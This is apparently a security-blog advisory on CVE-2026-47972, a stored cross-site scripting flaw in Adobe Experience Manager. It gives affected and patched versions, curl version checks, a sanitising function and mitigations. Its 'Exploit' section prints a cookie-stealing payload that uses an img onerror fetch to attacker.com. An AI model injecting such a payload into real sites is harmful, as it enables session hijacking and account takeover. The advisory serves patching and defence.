Listen to this Post
A low-privileged attacker with a valid AEM account can exploit CVE-2026-47972, a stored cross-site scripting vulnerability, by injecting malicious JavaScript into unsanitized form fields. When an administrator or other user with higher privileges views the page containing the attacker-controlled form input, the script executes in their browser context. Because the vulnerability is stored, the payload persists across sessions, affecting every subsequent visitor to the compromised page.
The root cause is improper neutralization of user-controllable input before it is placed in output that is served to other users. Attackers inject script tags or event handlers into vulnerable fields such as text inputs, rich text editors, or custom metadata fields. The injected code survives database persistence and is reflected back unsanitized when the page is rendered. The attack requires user interaction: the victim must browse to the affected page. The CVSS score is 5.4 (MEDIUM) with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N.
The scope is changed because the XSS vulnerability allows execution in a security context that may grant access to data or functionality beyond the attacker’s direct privileges. Typical impacts include session hijacking, defacement, forced redirection to malicious sites, or theft of CSRF tokens. Exploitation does not require advanced skills; an attacker can leverage built-in browser APIs to exfiltrate data. Adobe has not observed in-the-wild exploitation of this specific CVE, but the ubiquity of XSS in enterprise CMS makes it a frequent target during audit or red-team exercises. The vulnerability affects all versions of AEM 6.5 up to 6.5.24, LTS SP1, and AEM 2026.04 and earlier. Patched versions include AEM Cloud Service Release 2026.05, 6.5 LTS Service Pack 2, and 6.5 Service Pack 25.
DailyCVE Form:
Platform: AEM
Version: ≤2026.04
Vulnerability : stored XSS
Severity: Medium (5.4)
date: 2026-06-09
Prediction: AEM 2026.05
What Undercode Say:
Check AEM version via CRXDE
curl -s -u admin:admin "http://localhost:4502/crx/de/version.jsp" | grep "Version"
Check version via product info
curl -s -u admin:admin "http://localhost:4502/system/console/status-productinfo" | grep "Adobe Experience Manager"
Enumerate installed service packs
curl -s "http://localhost:4502/libs/granite/security/currentuser.json" | grep -A5 "service.pack"
Detect vulnerable versions (<=2026.04)
aem_version=$(curl -s -u admin:admin "http://localhost:4502/crx/de/version.jsp" | grep -oP 'Version \K[0-9.]+')
if [[ "$aem_version" < "2026.05" ]]; then echo "VULNERABLE to CVE-2026-47972"; fi
Example safe output filter (server-side)
function sanitize_input($data) {
$data = trim($data);
$data = stripslashes($data);
$data = htmlspecialchars($data, ENT_QUOTES, 'UTF-8');
return $data;
}
Exploit
No public exploit is currently available. However, the attack vector is straightforward: using an authenticated session, submit a form field containing `` or a more complex payload like <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">. The payload is stored in the AEM JCR repository and executed whenever any user, including administrators, views the affected page. The attack requires user interaction (the victim loads the page) and low privileges (any authenticated user can submit content).
Protection
- Upgrade to AEM Cloud Service Release 2026.05, 6.5 LTS Service Pack 2, or 6.5 Service Pack 25.
- Apply the official Adobe patch APSB26-56 immediately.
- Enable Content Security Policy (CSP) headers to restrict script execution.
- Implement output encoding in all JSP/HTL templates using `xss=”safe”` or
context="html". - Regularly audit user-submitted content with a WAF or manual inspection.
Impact
Successful exploitation leads to execution of arbitrary JavaScript in the victim’s browser. This can result in session hijacking, theft of sensitive data (including CSRF tokens and AEM internal API keys), account takeover if session cookies are stolen, defacement of the AEM site, and pivoting to internal network resources if the victim has elevated privileges. While confidentiality and integrity impacts are LOW per CVSS, the changed scope means an attacker could potentially access resources outside the original vulnerable component.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
